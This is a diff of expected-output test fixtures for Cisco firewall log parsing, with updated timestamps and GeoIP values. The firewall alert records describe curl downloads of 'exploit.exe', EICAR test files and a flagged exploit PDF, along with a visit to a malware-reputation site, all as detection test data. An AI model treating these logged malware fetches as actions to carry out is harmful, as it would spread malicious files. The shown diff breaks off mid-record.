@@ -22,25 +22,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:54:25.000Z", "file": { "name": "exploit.exe" }, + "@timestamp": "2019-08-14T14:54:25.000Z", "ecs": { "version": "1.12.0" }, @@ -61,7 +61,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721617600Z", + "ingested": "2021-12-14T14:37:57.970772097Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -124,25 +124,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:55:02.000Z", "file": { "name": "exploit.exe" }, + "@timestamp": "2019-08-14T14:55:02.000Z", "ecs": { "version": "1.12.0" }, 
@@ -163,7 +163,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721627200Z", + "ingested": "2021-12-14T14:37:57.970775122Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -226,25 +226,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:00:29.000Z", "file": { "name": "eicar.com" }, + "@timestamp": "2019-08-14T15:00:29.000Z", "ecs": { "version": "1.12.0" }, @@ -265,7 +265,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721633400Z", + "ingested": "2021-12-14T14:37:57.970775631Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", 
@@ -328,25 +328,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:01:41.000Z", "file": { "name": "eicar.com.txt" }, + "@timestamp": "2019-08-14T15:01:41.000Z", "ecs": { "version": "1.12.0" }, @@ -367,7 +367,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721639600Z", + "ingested": "2021-12-14T14:37:57.970776033Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", @@ -430,22 +430,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:03:28.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -453,6 +452,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:03:28.000Z", "ecs": { "version": "1.12.0" }, 
@@ -476,7 +476,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721645500Z", + "ingested": "2021-12-14T14:37:57.970776412Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -543,22 +543,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:03:33.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -566,6 +565,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:03:33.000Z", "ecs": { "version": "1.12.0" }, 
@@ -589,7 +589,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721651700Z", + "ingested": "2021-12-14T14:37:57.970776808Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -656,22 +656,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:09:43.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -679,6 +678,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:09:43.000Z", "ecs": { "version": "1.12.0" }, 
@@ -702,7 +702,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721657700Z", + "ingested": "2021-12-14T14:37:57.970777205Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", @@ -758,20 +758,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -790,22 +784,21 @@ "scheme": "http", "domain": "www.eicar.org" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:39:03.000Z", "file": { "size": 184, "name": "eicar_com.zip", 
@@ -813,6 +806,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-16T09:39:03.000Z", "ecs": { "version": "1.12.0" }, @@ -836,7 +830,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721663800Z", + "ingested": "2021-12-14T14:37:57.970777576Z", "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", @@ -904,22 +898,21 @@ "scheme": "http", "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:40:45.000Z", "file": { "size": 278987, "name": "dd3dee576d0cb4abfed00f97f0c71c1d", @@ -927,6 +920,7 @@ "sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7" } }, + "@timestamp": "2019-08-16T09:40:45.000Z", "ecs": { "version": "1.12.0" }, 
@@ -950,7 +944,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721669900Z", + "ingested": "2021-12-14T14:37:57.970777954Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", @@ -1005,20 +999,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -1036,22 +1024,21 @@ "scheme": "http", "domain": "81.2.69.144" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:42:07.000Z", "file": { "size": 278987, "name": "dd3dee576d0cb4abfed00f97f0c71c1d", 
@@ -1059,6 +1046,7 @@ "sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7" } }, + "@timestamp": "2019-08-16T09:42:07.000Z", "ecs": { "version": "1.12.0" }, @@ -1082,7 +1070,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:14.721675800Z", + "ingested": "2021-12-14T14:37:57.970778340Z", "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json index 66994577c9e..8c8efc22583 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json 
@@ -10,52 +10,40 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 246, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 65090, "bytes": 729, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "url": { "path": "/favicon.ico", @@ -67,15 +55,15 @@ "eyedropper-color-pick.info" ] }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "chrome", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -118,7 +106,7 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-12-09T13:33:16.993211300Z", + "ingested": "2021-12-14T14:38:00.339668743Z", "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event", diff --git a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json index d24b33ae03d..9ca1a278169 100644 --- a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -1,6 +1,15 @@ { "expected": [ { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.197", + "224.0.0.22" + ] + }, "log": { "level": "informational", "source": { 
@@ -17,28 +26,10 @@ "ip": "192.168.100.197" }, "message": "list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", - "transport": "igmp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.197", - "224.0.0.22" - ] - }, "event": { "severity": 6, "sequence": 585917, - "ingested": "2021-12-09T13:33:17.492482Z", + "ingested": "2021-12-14T14:38:00.838124062Z", "original": "Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "code": "IPACCESSLOGRP", "provider": "firewall", @@ -51,6 +42,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", + "transport": "igmp", + "type": "ipv4", + "packets": 1 } }, { @@ -94,7 +94,7 @@ "event": { "severity": 6, "sequence": 585918, - "ingested": "2021-12-09T13:33:17.492489100Z", + "ingested": "2021-12-14T14:38:00.838127289Z", "original": "Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "code": "IPACCESSLOGSP", "provider": "firewall", @@ -110,6 +110,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.1", + "255.255.255.255" + ] + }, "log": { "level": "informational", "source": { 
@@ -126,27 +135,10 @@ "ip": "192.168.100.1" }, "message": "list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4", - "iana_number": "0", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.1", - "255.255.255.255" - ] - }, "event": { "severity": 6, "sequence": 585919, - "ingested": "2021-12-09T13:33:17.492495400Z", + "ingested": "2021-12-14T14:38:00.838127895Z", "original": "Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "code": "IPACCESSLOGNP", "provider": "firewall", @@ -159,9 +151,25 @@ "facility": "SEC", "access_list": "171" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4", + "iana_number": "0", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ] + }, "log": { "level": "informational", "source": { @@ -171,18 +179,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, @@ -191,18 +193,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 1027, 
@@ -210,27 +206,10 @@ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", - "transport": "tcp", - "type": "ipv6", - "packets": 9 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - ] - }, "event": { "severity": 6, "sequence": 585920, - "ingested": "2021-12-09T13:33:17.492501Z", + "ingested": "2021-12-14T14:38:00.838128418Z", "original": "May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "code": "ACCESSLOGP", "provider": "firewall", @@ -243,9 +222,27 @@ "facility": "IPV6", "access_list": "ACL-IPv6-E0/0-IN/10" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", + "transport": "tcp", + "type": "ipv6", + "packets": 9 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { 
@@ -264,28 +261,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663303, - "ingested": "2021-12-09T13:33:17.492506500Z", + "ingested": "2021-12-14T14:38:00.838128898Z", "original": "Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -298,6 +277,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { @@ -342,7 +330,7 @@ "event": { "severity": 6, "sequence": 1663304, - "ingested": "2021-12-09T13:33:17.492511400Z", + "ingested": "2021-12-14T14:38:00.838129384Z", "original": "Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "code": "IPACCESSLOGDP", "provider": "firewall", @@ -358,6 +346,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { 
@@ -376,28 +373,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663312, - "ingested": "2021-12-09T13:33:17.492514700Z", + "ingested": "2021-12-14T14:38:00.838129867Z", "original": "Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -410,6 +389,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { @@ -425,7 +413,7 @@ "event": { "severity": 6, "sequence": 1663313, - "ingested": "2021-12-09T13:33:17.492519Z", + "ingested": "2021-12-14T14:38:00.838130372Z", "original": "Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets", "code": "IPACCESSLOGRL", "provider": "firewall", @@ -443,6 +431,15 @@ ] }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { 
@@ -461,28 +458,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663314, - "ingested": "2021-12-09T13:33:17.492524100Z", + "ingested": "2021-12-14T14:38:00.838130841Z", "original": "Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -495,9 +474,27 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.12", + "81.2.69.144" + ] + }, "log": { "level": "informational", "source": { @@ -507,20 +504,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": 